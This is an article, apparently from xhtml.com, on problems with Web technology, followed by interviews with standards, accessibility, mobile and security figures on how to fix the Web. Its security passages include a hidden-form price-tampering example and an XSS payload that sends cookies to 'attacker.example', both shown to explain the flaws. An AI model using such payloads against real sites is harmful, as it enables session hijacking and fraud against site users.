Extensible HyperText Markup Language

Fixing the Web - part 1

Does the Web need fixing?

The Web is about 17 years old. For its first 10 years, Web technology evolved at breakneck speed. But for the last 7 years, Web technology hasn't changed much at all. Is this a problem? There are clear benefits to having a stable development environment, but is Web technology stable or stale? Without innovation, will the Web suffer the same fate as any technology that becomes outdated because it fails to keep pace with users' needs?

The Web certainly performs adequately as an information source, but how well does Web technology itself work? To answer this question, let's look at some problems with the Web:

Much of the Web is not accessible

Millions of people cannot participate fully online because most Web sites are built for people with perfect vision and the manual dexterity needed to operate a mouse.

The Web is not device-independent

Cell phones and other small-screen mobile devices capable of browsing the Web will soon greatly outnumber desktop computers. Yet most Web sites are designed for large-screen monitors, making it extremely difficult to browse the Web using mobile devices.

Web best practices are difficult to master

The fundamentals of Web technology are easy to understand. As a result, even novices can build Web sites. But building a usable, accessible and device-independent Web site is quite challenging. Understanding how to use X/HTML correctly and mastering CSS and JavaScript can involve a steep learning curve.

Web design is a challenge

Though it's possible to build very attractive sites using current Web technology, some of the more sophisticated and interactive visual effects can only be achieved through browser plug-ins like Flash. Even basic effects such as drop shadows and rounded corners cannot be achieved consistently across browsers, or require hacks.
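As a rough sketch of the kind of workaround this forces (the class name is invented for illustration), rounded corners today rely on browser-specific CSS properties, and Internet Explorer users still see square corners unless the author resorts to corner images or scripting:

  <style type="text/css">
    /* "promo-box" is a hypothetical class name for this example */
    .promo-box {
      -moz-border-radius: 8px;     /* Gecko (Firefox) only */
      -webkit-border-radius: 8px;  /* WebKit (Safari) only */
      /* No equivalent in IE 6/7: authors fall back to corner
         images, extra wrapper markup or JavaScript hacks */
    }
  </style>
  <div class="promo-box">Rounded in some browsers, square in others.</div>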

Web application development is a challenge

Current Web technology limits the functionality of Web applications compared to desktop applications. Web developers have fewer form controls to choose from, and basic features one expects from a network application are not possible in a Web environment. For example, because of the stateless nature of HTTP, it is not possible to get an accurate count of the active users of a Web application at any given time. Nor can a server push a message to all active users, because communication can only be initiated by the client.

Web internationalization is a challenge

One would expect that a global information system like the Web would be built with equal support for all of the world's languages. Unfortunately, much Web technology is still ASCII-based. Aside from architectural issues such as supporting non-ASCII characters in URLs, Web content is riddled with cryptic character entities (such as &auml;) and Numeric Character References (such as &#8364;) instead of natural-language text (such as Greek or Russian), which makes content less human-readable and more difficult to maintain.
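As a minimal sketch (the Russian phrase is just an example), the same sentence looks very different in an ASCII-only page that relies on Numeric Character References and in a page that declares UTF-8 and stores the text directly:

  <!-- ASCII file: every non-ASCII character becomes a numeric reference -->
  <p>&#1055;&#1088;&#1080;&#1074;&#1077;&#1090;, &#1084;&#1080;&#1088;!</p>

  <!-- Separate file declared as UTF-8 in its XML declaration
       (or via the HTTP Content-Type header): the text stays readable -->
  <?xml version="1.0" encoding="UTF-8"?>
  ...
  <p>Привет, мир!</p>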

Interoperability is a challenge

Building Web sites and applications that work equally well in different Web browsers is a challenge. Browser vendors are hesitant to fix certain bugs because many Web sites have been developed that rely on buggy or incorrect behavior. Many developers also build Web sites for specific browsers or screen resolutions. Many Web sites still bear notices that read "Best Viewed With Browser X".

Data on the Web cannot be repurposed

One of the expected benefits of the Web as a digital medium is that data can be repurposed. For example, an article written for one Web site can, in the future, be re-published on other sites, printed in a magazine, or added to a knowledge base in a desktop application, all without manually reformatting or restructuring the data. Unfortunately, current Web technology encourages Web page layout to be fused with content, and content to be fused with formatting. As long as this continues, the promise of data repurposing can never be realized.
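A small, hypothetical before-and-after illustrates the point: in the first fragment nothing identifies the headline as a headline, so republishing the text elsewhere means re-doing the work by hand; in the second, structure lives in the markup and formatting is delegated to a style sheet. (The "article-title" class name is invented for the example.)

  <!-- Presentation fused with content -->
  <font size="5" color="#003366"><b>Fixing the Web</b></font>
  <br /><br />
  The Web is about 17 years old...

  <!-- Structure in the markup, formatting moved to CSS -->
  <h1 class="article-title">Fixing the Web</h1>
  <p>The Web is about 17 years old...</p>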

The Web is not secure

Web technology is susceptible to simple hacking techniques. An attack can be as easy as modifying the query string in a URL, or saving a local copy of an X/HTML page containing a form, modifying it, and submitting data to the server from that local copy. Web developers need to be experts in security in order to overcome the open nature of Web technology.
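A hypothetical sketch of the second technique (the form fields and values are invented): nothing stops a visitor from saving this page, editing the hidden value, and submitting the local copy, so a server that trusts the submitted price has already lost.

  <!-- As served: the site assumes the hidden price cannot change -->
  <form action="http://www.example.com/checkout" method="post">
    <input type="hidden" name="price" value="199.00" />
    <input type="submit" value="Buy now" />
  </form>

  <!-- In a saved local copy, one edited attribute is enough -->
  <input type="hidden" name="price" value="1.00" />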

Web technology is susceptible to mischief

Publishers on the Web are exposed to mischief such as email address harvesting by bots, spamming through HTTP referrer headers, or bots that fill out Web forms. Publishers themselves also abuse Web technology for the purpose of fooling search engines or extracting private data from Web visitors.

The Web is not machine friendly

People are capable of deriving information or meaning from data just by looking at it. Machines, on the other hand, need data to be well structured in order to process it correctly. Since data on the Web is very poorly structured, machines cannot derive meaning from it. Why is this important? Because people retrieve information on the Web using search engines, which are machines. If machines can't make sense of Web site data, then the results you get back from search queries are not going to be the most relevant ones.

Given these and other problems with the Web, do we need new technology, or can current Web technology evolve to address such problems?

Interviews with technology stakeholders in the Web

In this section, xhtml.com asks a diverse group of stakeholders in Web technology to share their thoughts on how to address current challenges the Web faces, in order to transition to the Web of the future. Each participant in this interview is asked the same question:

"In your opinion, what parts of the Web need to be improved or fixed in order for the Web of today to evolve into the Web of the future?"

Chris Wilson

In 1993 and '94, Chris Wilson wrote the first major implementations of CSS. In 1995, Chris joined Microsoft as a developer. He is now Platform Architect of the Internet Explorer Platform team, where he has always pushed for the inclusion in IE of the latest technologies. In the last several years, Chris and his team have spent a lot of time listening to and addressing the needs of the diverse IE user base made up of nearly 500 million people. In 2007, Chris became co-chair of the HTML Working Group at W3C. Chris writes:

The Web has tended to evolve in a very smooth way—there are few sharp inflection points to the evolution of the Web. I don't think there is any single glaring problem that is preventing the Web from continuing to evolve; the Web has a way of evolving around problems.

Probably the biggest challenge on the Web today revolves around interoperability, compatibility and standards compliance. All the major browser vendors (including Microsoft) have stated and demonstrated a commitment to interoperability and standards compliance. However, some believe that should come at the cost of backwards compatibility. I don't agree with that; one of the tenets that Microsoft holds dear is that content and applications should continue to work, even when new platforms are deployed.

A second, somewhat related problem is that of browser deployment and the Balkanization of versions in play. Every browser contains two completely different things—a browser user experience and an implementation of the Web platform (HTML, CSS, etc.). Users typically upgrade to the next browser for a better user experience. Web developers care about the Web platform, of course, and it's hard to upgrade users to a new Web platform if they are comfortable with their current user experience. This leads to a reliance on Web frameworks for Web developers—they can get a lot of new functionality, and be confident it will work even on older browsers. This means the innovation in the browser Web platform has a very long latency—even if we add major functionality to the next version of IE, it can be years before web developers can rely on it.

So in short, I think the biggest challenges in evolving the Web are a long latency in browser deployment, and the necessity of evolving the Web in a non-destructive way.

Daniel Glazman

In 2000, Daniel Glazman joined Netscape Communications, where he implemented new features in both the CSS engine and the HTML editor called Composer. After the fall of Netscape in July 2003, Daniel founded Disruptive Innovations and led development of the popular standalone WYSIWYG Web page editor Nvu. In September 2006, Daniel announced he was working on Nvu's successor, Composer 2.0, as a Mozilla project, and promised "...it will be something totally new, entirely rewritten, and the feature list will make Nvu look like a prehistoric web editor..." Daniel is a CSS Working Group member at W3C and a contributor to the HTML Working Group. Daniel writes:

First, I think the World Wide Web is a rather mature technology, given its age and the number of users around the world. It works, and it works beautifully, for the vast majority of people. Corporations and governmental organizations providing online services want to improve the Web, but it's not as if the Web as it is today were not enough for our daily needs. So what can we do to improve the service provider-user relationship? What can we do to help Web authors? What can we do to offer a new range of services?

What we needed most is the acknowledgement that the Web is based on HTML 4, CSS, JavaScript and a few other technologies. That is now done, with the W3C working on a successor to HTML 4 based on the work done by the WHAT-WG. XHTML 2 is not the future of the Web. Good :-)

Then we need better forms. A Web author is fighting on a daily basis with HTML forms, because they are not powerful enough and cannot easily represent corporate needs. We also need to preserve the original spirit of simplicity of HTML, so the learning curve of the new language does not drastically differ from HTML 4's.

We probably need to improve CSS a lot, because CSS as it stands today has intrinsic constraints inherited from a past when CPU power and memory were expensive. I understand mobile devices still have these constraints, but the situation is improving every day.

Finally, browser vendors need to understand the impact of Web 2.0 and find solutions so features like the Back button still work even if a Web page is downloading data through XMLHttpRequest.

As a conclusion, I would say the Web only needs evolution, not revolution.

Joe Clark

Joe Clark is a Web standards and accessibility advocate, consultant and speaker and is enormously knowledgeable about the Web. His passionate style and commitment have earned him a large and loyal following of Web developers. Joe is the author of the highly informative book Building Accessible Websites and of hundreds of articles. Joe writes:

Training of developers. We may not need actual certification, though that shouldn't be dismissed out of hand. [The province of] Ontario [in Canada] has a registry of graphic designers, for example. It's the only place in North America that does, and it's a potential model.

We need some kind of program to fire all the teachers at podunk community colleges who are still teaching tables and spacer GIFs, and replace them with people whose skills have evolved since 1997. Then we'll insist that existing developers improve their skill level and become at least as good at standards-compliant development as we are. And if they won't upgrade their skills, let's fire them, too. They're in the wrong business.

Doug Geoffray

Doug Geoffray is co-owner of GW Micro, maker of the popular screen reader Window-Eyes, which allows blind and visually impaired users to participate in the Web. Invited to speak at Yahoo's internal front-end engineering conference in March 2007, Doug was described as a "touchstone" resource for assessing the current state of screen reader technology and the challenges faced in developing screen-reader-accessible dynamic Web pages. Doug writes:

The biggest hurdle facing future Web development is educating Web developers about the disabilities that challenge standard Web access methods, and about discerning and implementing the accessibility solutions that already exist.

The technology used to design, implement, and ultimately view Web-based information (i.e. browsers, authoring tools, development platforms, etc.) will be devoid of accessibility issues if developers understand accessibility characteristics early in the design process.

Just as curb cuts allow wheelchair users access to sidewalks, accessibility solutions need to be built in from the ground up, not as an afterthought. It is not, however, within the scope of assistive technology (AT) to interpret and parse information in order to make the inaccessible more accessible (although many times, hacks must be included to keep people with disabilities from being excluded).

Take, for example, the simplistic notion of attaching alternative text to a graphical link. A developer who understands the importance of alternative text, and knows how to apply the information, can create efficient, navigable interfaces with clear and easy to understand link names without sacrificing visual appeal. A developer who is unfamiliar with the necessity of alternative text would create an interface that, while visually pleasing, is a confusing tangle of unintelligible links for someone who is visually impaired. Imagine a screen reader user hearing clear-cut information like, "Home, Products, or Catalog" when navigating through links on a page, versus imperceptible information like, "/index.php?dir=1, /prod/www/2007pubs/, or /images/tn2115_ColorMatchedImage.jpg."
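A minimal before-and-after sketch of that example (the link target is invented; the image path is the one Doug cites): without alternative text, a screen reader has nothing better to announce than the file name, while one alt attribute gives the link a human name.

  <!-- Announced as something like "/images/tn2115_ColorMatchedImage.jpg" -->
  <a href="/products/"><img src="/images/tn2115_ColorMatchedImage.jpg" /></a>

  <!-- Announced as "Products" -->
  <a href="/products/"><img src="/images/tn2115_ColorMatchedImage.jpg" alt="Products" /></a>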

The Internet allows people with disabilities a far greater reach than physical access. Web based technology is driven to reach the end users, and end users long to reach out through Web based technology. It's a symbiotic relationship that drives the need for newer and better solutions. Understanding the need for accessibility solutions early in the development stage of any technology is crucial for the future of Web development.

Roberto Scano

Roberto Scano represents the IWA/HWG inside W3C, and is a member of the WCAG and ATAG Working Groups at W3C. In 2002, Roberto developed the first Italian accessibility law project (the "Campa-Palmieri Act"). Roberto is the author of Accessibility: from theory to reality and developer of the CMS called Fruibile. Roberto writes:

Fixing the Web is extremely difficult, because the Web evolves every day, every hour. I think that one big problem for today's Web is the fact that Web content creators (Web developers, and also non-technical content creators who use CMSs) don't understand the importance of structure in a document. Many don't know the correct use of headings and other elements, and so they generate content that cannot be clearly identified by search engines and assistive technologies, and cannot be reused. Today the Web offers full interaction with users: text, images, and videos. If we don't use tools today to make sure this content is standards-compliant, then all of this content will need to be reorganized in the future as technology advances. To avoid this, new technologies for managing content should use XML for storing data, and allow users to visualize and personalize data.
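A short, invented illustration of what "structure" means here: the first fragment merely looks like headings, while the second gives search engines and assistive technologies a real outline to identify and navigate.

  <!-- No structure: every "heading" is just styled text -->
  <div class="bigTitle">Annual Report</div>
  <div class="mediumTitle">Financial results</div>

  <!-- A real outline, and therefore reusable content -->
  <h1>Annual Report</h1>
  <h2>Financial results</h2>
  <h2>Outlook for next year</h2>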

New specifications are on the way that will help make Web content (WCAG and ISO 9241-151) and Web applications (ATAG and WebApp) more accessible. But it is important that companies that develop Web applications think "with accessibility and reusability in mind". As I mentioned before, this will help search engines to index Web content, help users browse content, and help people with disabilities to fully experience the Web. If we follow these suggestions, we will have a superior Web that is more accessible, easier to interact with, and one that permits better data exchange. Remember, the Web is what we make it.

Jeffrey Veen

Jeffrey Veen leads a team of over 30 designers and researchers at Google who focus on improving the user experience of Google applications. Jeffrey's passion for integrating content, graphic design, and technology from a user-centered perspective has earned him his reputation as an internationally recognized speaker and consultant on the Web user experience. Jeffrey also authored "The Art & Science of Web Design" and "HotWired Style: Principles for Building Smart Web Sites". Jeffrey writes:

I wish every device that was capable of talking to the network could send its geolocation. I'd like this to be fundamental—let's send longitude and latitude in the HTTP header of every request. Let's make it as ubiquitous and accessible as the time stamp, user agent, and referring URL.
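Purely as a sketch of the idea (the header name and format here are hypothetical, invented only to make the proposal concrete), a request carrying location might look something like this:

  GET /weather HTTP/1.1
  Host: www.example.com
  User-Agent: Mozilla/5.0 (compatible; ExampleBrowser)
  Referer: http://www.example.com/
  Geo-Position: 51.5074, -0.1278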

When location is assumed, we can go beyond the obvious applications of a geo-aware Web. Yes, the map application will be able to center on you when you launch it. But what else becomes possible when email knows where you were when you sent it, or a social app knows the proximity of your friends? We can't even begin to imagine what will emerge.

But what about the security and privacy implications? We've been dealing with them since the first Web sites launched. Issues with cookies, cross-site scripting, and search query logs have given us precedents for enhancing rather than exploiting personal data. Giving users control of their location can follow the same path.

There are hurdles, to be sure. Hardware manufacturers still believe access to location data should be a business opportunity, much like software companies once believed proprietary file formats would protect their bottom line.

That's a shame. The Web grew to prominence providing the "what" and knowing the "who." Let's add the "where" and see what happens next.

Dave Raggett

Dave Raggett is employed by Volantis Systems but works on assignment to the W3C as a member of the Ubiquitous Web Domain team. The Ubiquitous Web team focuses on technologies that enable Web access for anyone, using any device. Dave has been closely involved with the development of Web standards since 1992, contributing to work on HTML, HTTP, MathML, XForms, and is recognized internationally for his development of W3C's hugely popular HTML Tidy utility, which is designed to clean up bad HTML and in the process improve the accessibility of HTML documents. Dave writes:

For many people, the Web today is still about what you can access from a desktop or laptop browser with a large screen. There is limited awareness of Web access from mobile devices and of the challenges facing people with disabilities, and even fewer people are aware of the broader potential. One success story has been the application of Web technology to voice-based services with VoiceXML and its related specifications. This represents a convergence of the Web and the telephone. Large businesses are exploiting VoiceXML to handle a wide range of calls, and we can expect to see this spread to medium and small businesses, as all businesses need to provide phone access in addition to conventional visual Web pages.

Moore's law is driving down the cost of adding networking capabilities to all kinds of devices, whether in the home, at work, or on the move. Web technologies have the potential to simplify the task of developing applications that work across a mix of product generations, vendors and networking technologies. This is the focus of W3C's new Ubiquitous Web Applications Working Group. Some of the challenges it faces include: usable security; remote user interfaces (e.g. controlling your home from your television or smart phone); enabling applications to dynamically adapt to changes in user preferences, device capabilities and environmental conditions; the ability to combine local and remote services; and the potential for applying markup for agents that act on behalf of users, either in local devices or on remote Web sites.

Web applications are increasingly complex and costly to develop and maintain. There is huge potential for easier-to-use tools that exploit declarative techniques to capture what you want to happen, without requiring you to provide all the details of how. Developers shouldn't be required to know the ins and outs of (X)HTML, CSS, the DOM and all the messy variations across browsers. W3C is leading the way towards a future where many more people will be able to develop a much broader range of applications, of kinds you can only dream about today.

Mike Andrews

Mike Andrews is a security expert and a principal at Foundstone, a McAfee company that offers products, services and education designed to optimize network security. At Foundstone, Mike leads the Web Application Security Assessments team and teaches hacking classes that help security professionals and application designers recognize and protect against system vulnerabilities. His many speaking engagements include his "must see" April 2006 Google Video presentation "How To Break Web Software—A look at security vulnerabilities in web software". Mike is also the author of "How to Break Web Software: Functional and Security Testing of Web Applications and Web Services". Mike writes:

From a security perspective, the Web of today is pretty badly broken. There's the obvious refrain of input validation (which in many cases is harder than people imagine), and all the vulnerabilities that would disappear if it were done fully and correctly, but let's pick on one vulnerability for now: cross-site scripting and its many variations.

Cross-site scripting comes about because one of the main tenets of security is broken in HTML—never mix code and data. Code, in the form of JavaScript (or VBScript, etc.), can be interspersed in the "data" of HTML, the markup of a page, in so many places: script blocks, attributes, style sheets, and so on. With this amount of opportunity there are many alternative ways of getting malicious code into a page, where it can perform different actions for different attacks. With just a small flaw in a Web application, one can write code that modifies a page's content for a phishing attack, accesses cookies for session hijacking, or creates HTTP requests for cross-site request forgeries. Researchers are pushing the boundaries even further now, where JavaScript can be used to scan an internal network, fingerprint servers, create and control worms, and perform password cracking/brute forcing.
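A simplified, invented sketch of a reflected attack: a search page that echoes its query-string parameter straight into the markup lets an attacker's "data" become executable code in every victim's browser.

  <!-- Normal output: the page echoes the q parameter without escaping it -->
  <p>Results for: <strong>widgets</strong></p>

  <!-- Output for a crafted link whose q parameter contains a script:
       the attacker's code now runs in the victim's session -->
  <p>Results for: <strong><script>document.location =
    'http://attacker.example/steal?c=' + document.cookie;</script></strong></p>

  <!-- Escaped output keeps the same input as harmless data -->
  <p>Results for: <strong>&lt;script&gt;document.location = ...&lt;/script&gt;</strong></p>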

So, if there were one thing that I would like fixed or improved in the Web of tomorrow, it would be greater control over where code can exist in a page, and some verification of where that code came from. This would make it much easier for developers to validate inputs, and give users more "trust" that the page they are visiting is not doing something malicious behind their back.

James Pearce

James Pearce is vice president of technology at dotMobi, the official worldwide registry for the .mobi domain. James is responsible for dotMobi product and technology roadmaps and steers dotMobi's initiatives that aim to provide developers with the information and tools they need to build a faster, more reliable mobile Internet experience. James writes:

Fundamentally this question assumes that the Web can be consciously improved or fixed at all! In fact, the Web on any given day is really just the result of the motivations of the people and organizations that have created content and services on, and via, it.

We believe that the evolution of the Web to become mobile is absolutely inevitable. In the future we will look back at ourselves in the early years of the 21st century and laugh that we used to have to sit at a lonely PC screen to enjoy our on-line existence. That will seem as antiquated and quaint as the idea of the 1950s family gathering around a box radio in their sitting room to listen to music.

The Web will lose the shackles of immobility and start to meld itself ever more seamlessly around our human life, which, of course, is rarely static for very long.

The Web's technology will not need to evolve very much to start working well on mobile handsets (which have increasingly reliable browsers); however it needs to be used in a sympathetic way. There's no point going crazy and showing off with bloated heavyweight content, not because of network speed, but because users on the move are by definition impatient and want to cut to the chase.

That makes mobile Web development quite a cathartic experience: in fact there's a certain Zen in creating a streamlined on-line service that is primarily designed for mobile.

But ultimately the successful content and services of the coming years will be those that not only take the mobile browser's behaviour into consideration, but which are primarily aimed at users in the mobile context. Not surprisingly, users rarely want pieces of a large Web presence squeezed down to their mobile phone—rather, they want a compelling and beautifully designed Web that suits their mobile lifestyle.

So my answer to your question is this: for the mobile Web (which is the Web of the future), Web developers should think different.

Nova Spivack

Nova Spivack co-founded one of the first Internet companies, EarthWeb, in 1994. After he left EarthWeb in 1999, Nova's involvement in technology startups and incubators, plus his enduring interest in cognitive science and artificial intelligence, led him to found Radar Networks. Radar Networks (of which Nova is CEO) is developing a new online service based on the semantic Web that will help people work with information more productively on the Web. The service combines human-powered collective intelligence with artificial intelligence to learn about and make sense of information on the Web. Nova has co-authored several books on Internet strategy and technology, and is a sought-after media source and speaker on future-pointing technologies. His weblog, Minding the Planet, focuses on Radar Networks and emerging technologies. Radar Networks' first product is scheduled for launch in Fall 2007. Nova writes:

Personally, I'm working on the Semantic Web, so I think that the Web could benefit greatly from more semantic structure. By adding richer semantics to the data of the Web, the Web could become more precisely searchable and navigable by humans, and software agents could more easily mine it and form new layers of knowledge on top of it. This would transform the Web into a much richer and more connected knowledge commons. Today the Web is primarily authored and maintained by humans, but with the addition of richer metadata—such as RDF and OWL metadata—it will start to be authored and maintained by software agents as well. This will enable the Web to start to evolve faster and more profoundly. Agents will be able to crawl the Web looking for new connections between things, as well as for new entities and interesting assertions and facts—and when they find them they will be able to create new resources, annotations, or links that embody them.

I envision a Web that combines the best of human-powered social filtering and tagging with automated filtering, mining, learning and tagging by software agents—a Web that learns and self-optimizes in a manner that will resemble something like the human brain, on a global scale. But to reach this point we have much to do. RDF has barely been adopted at all outside of academic and government circles. OWL is only starting to really be applied. There are few examples of "killer apps" of the Semantic Web so far (but at Radar Networks, we will be launching one soon...). Currently the Web is like a giant distributed file server, but with the addition of RDF it will become more like a giant distributed database. This will take time—perhaps 10 years or more. But the process is already starting today.

Mark Birbeck

Mark Birbeck has spent the last 7 years designing, building and thinking about dynamic user interfaces. His aim is to build the framework for a new generation of Internet applications, where the user interface changes automatically, based on the data being interacted with. His expectations are that such a framework will dramatically increase programming productivity, and open the world of application building to many more people. Mark is an invited expert on W3C's XForms and XHTML 2 Working Groups, and his companies have created formsPlayer, an XForms processor for IE, and Sidewinder, a next-generation semantic Web browser which seamlessly combines XForms with languages such as SVG, MathML and X3D. Mark writes:

I actually have a very positive view of the transition to the 'future Web', and I see many of the things that one might say we need for a better Web already emerging. For example, we need the differences between browsers to be removed, but due to the high quality of libraries such as YUI, Dojo, and Prototype this is well underway. We also need there to be a convergence of application development techniques, so that the same languages can be used for the Web, desktop applications, gadgets, widgets, and so on; but with an explosion of interest in HTML, JavaScript and XForms—as well as the appearance of multi-language platforms like Silverlight—this trend also looks set to continue.

So whilst I might say that these things are crucial to the future of the Web, they are also very much underway and, barring a collective overnight loss of memory by the development community, look certain to continue. But there is one thing that to me doesn't look so assured, and that is whether standards will be agreed upon around Ajax and, more generally, around the whole approach to standards development.

In general, standards (at least those from the W3C) are developed in a kind of 'kitchen-sink' style, where some specification tries to include just about everything that can be devised on a particular topic—and therefore takes years to write. A good example is SVG, and even, to some extent, my own favorite, XForms. In both cases there are many useful things that could be factored out of these specifications to be made available elsewhere as smaller, more manageable components, but it is only recently that this approach has started to be tried. Good examples of the 'bite-size' approach are the 'role attribute', 'access', and RDFa, which provide techniques for adding metadata to web documents as well as making them more accessible.
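For instance, a small XHTML fragment (the values here are purely illustrative) can pick up machine-readable metadata and an accessibility hint with a handful of attributes, without waiting for a monolithic new language:

  <div xmlns:dc="http://purl.org/dc/elements/1.1/">
    <ul role="navigation">
      <li><a href="/articles/">Articles</a></li>
    </ul>
    <h2 property="dc:title">Fixing the Web</h2>
    <p>Published by <span property="dc:creator">xhtml.com</span>.</p>
  </div>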

A good sign that some are learning that this is a promising approach to writing specifications is the backplane initiative at the W3C. But unfortunately, an illustration that the lesson hasn't been learned everywhere is the W3C's embracing of HTML 5, which is not only a case study in kitchen-sink design—let's throw everything in there—but a case study too of the problems caused by the 'not invented here' mindset.

If the W3C continues to support the creation of enormous specifications that take years rather than months to complete, then it will almost certainly become increasingly irrelevant to the 'future Web'. Of course, based on the W3C's lack of coherent leadership around the whole HTML 5 question, some might not see that as necessarily a bad thing, but it does raise the question as to whether other organizations can fill the space with a better process. For example, can the Open Ajax Alliance take a much more focused approach to standards writing, creating small specifications that can be easily combined? If so, it's possible that the vacuum would be filled, and the future of the 'future Web' would stand on a firmer footing.

Whilst I'm not quite sure where the future of standards creation will come from, the sheer dynamism we see in the Web development space makes me certain that it is imminent. If we can devote even a fraction of that creative energy to evolving a new approach to standards development, the future of the 'future Web' looks very bright indeed. But if we don't, then for the foreseeable future we are looking at increasing fragmentation, with the lack of standardization in the browser merely being transferred to a 'lack of standardization in the libraries'.